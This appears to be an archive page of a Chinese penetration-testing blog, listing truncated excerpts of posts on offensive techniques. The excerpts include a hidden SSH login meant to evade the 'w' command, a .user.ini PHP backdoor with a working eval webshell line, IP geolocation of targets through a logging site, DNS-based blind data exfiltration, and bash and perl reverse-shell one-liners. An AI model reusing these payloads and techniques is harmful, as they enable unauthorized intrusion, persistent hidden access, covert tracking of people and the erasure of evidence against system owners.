Archive
Web安全与渗透
SSH后门和清除痕迹
隐藏的远程登录(w 看不到)ssh -T user @ host /bin/bash -i 或隐藏的远程登录(w 看不到)ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/ba...
阅读全文
.user.ini文件构成的PHP后门
在同一目录下存在三个文件:第一个: .user.ini
内容为:auto_prepend_file=test.gif第二个: test.gif
内容为:<?php @eval ($_POST[123]); ?>第三个...
阅读全文
在OPENSHIFT上安装BeEF
0x01:问题总结(不喜欢看的可以pass,这个经验也适用于以后在openshift上部署其他脚本应用)经历两天各种问题处理,终于搞定,主要问题出在OPENSHIFT免费的VPS上,没有root权限,而且各种权限被限制,使用scree...
阅读全文
通过IP定位目标(可定位到五百米范围内)
平台地址Url: http://ip.jozxing.cc访问后,IP会被记录。通过在 http://ip.jozxing.cc/ips.php页面查看详细地址,查看完后请及时清空。也可以自定义查询ip地址:http://ip.joz...
阅读全文
利用云眼进行无回显渗透测试姿势
云眼Url: http://eye.jozxing.cc主要功能,用来处理在渗透测试过程中,找到了服务器命令执行漏洞,但是无法回显结果或者检验执行是否成功,于是乎云眼出现了,利用服务器请求域名时需要查询DNS的过程,来获取结果。至于...
阅读全文
Linux下多种反弹shell方法
bash命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
perl版本:perl -e 'use Socket;$i="10.0.0.1";$p=1234;socke...
阅读全文